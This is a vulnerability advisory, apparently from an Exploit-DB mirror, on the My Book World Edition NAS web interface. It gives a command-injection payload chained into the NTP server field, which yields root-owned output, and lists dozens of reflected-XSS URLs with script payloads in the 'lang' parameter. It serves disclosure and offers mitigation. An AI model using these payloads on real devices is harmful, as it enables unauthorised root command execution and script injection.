My Book World Edition NAS multiple vulnerability

vendor:

My Book World Edition NAS

by:

Emanuele 'emgent' Gentili

7.5

CVSS

HIGH

Remote Command Execution, Web Server Default Security Misconfiguration, Information Disclosure, Cross Site Scripting (XSS)

79, 200, 522, 79

CWE

Product Name: My Book World Edition NAS

Affected Version From: 01.01.16

Affected Version To: 01.01.16

Patch Exists: NO

Related CWE: N/A

CPE: h:wdc:my_book_world_edition_nas

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

My Book World Edition NAS multiple vulnerability

My Book World Edition NAS is vulnerable to Remote Command Execution, Web Server Default Security Misconfiguration, Information Disclosure, and Cross Site Scripting (XSS). Remote Command Execution can be achieved by entering a malicious command in the NTP TIME SERVER box on the e_datetime.php and system_general.php pages. Web Server Default Security Misconfiguration can be exploited by running commands with root privileges. Information Disclosure can be exploited by browsing the express.php page. Cross Site Scripting (XSS) can be exploited by entering malicious code in the ?lang= parameter of multiple pages.

Mitigation:

Ensure that all services and web applications are running with the least privileges necessary. Block access to the express.php page. Validate all user input.

Source

Exploit-DB raw data:

# Exploit Title: My Book World Edition NAS multiple vulnerability
# Date: 20091230
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20091230-NAS.txt
# Version: 01.01.16 with MioNet 2.3.9.13 firmware.
# CVE : N/A
# Vendor: http://www.wdc.com/mybookworld

[+] REMOTE COMMAND EXECUTION

Pages:
http://10.12.6.111/admin/e_datetime.php?lang=en
http://10.12.6.111/admin/system_general.php?lang=en

Box entry:
NTP TIME SERVER: "pool.ntp.org && touch /tmp/pwned.txt"

Output:
~ # ls -la /tmp/ |grep pwned
-rw-rw-rw-    1 root     root            0 Dec 30 08:25 pwned.txt
~ #


[+] WEB SERVER DEFAULT SECURITY MISSCONFIGURATION

All services and web applications run with root privileges, so exploiting
web apps is possible run command with uid 0 privileges.


[+] INFORMATION DISCLOSURE

Browsing http://10.12.6.111/help/express.php?lang=en%22 is possible see the real path
in the system, via xml error not blocked.


[+] CROSS SITE SCRIPTING (XSS)

A lot of XSS attacks are possible in this web application, all "?lang=" var are vulnerable.

http://10.12.6.111/admin/basic_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_config_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_alerts.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_automated.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_manual.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_general.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_advanced.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_generate_ssl_form.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_lan.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_service.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_workgroup_domain.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_disk_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_volume_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_usb_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_quota_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_download_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_change_btadmin_passwd.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/media_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/itune_server_properties.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_system.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_cifs.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_ftp.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_setting.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_machine.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_datetime.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_network.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_mionet.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/basic_index.php?action=logout&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/help/system.php?lang=en"><script>alert('XSS');</script>&page=system_summary
and more other...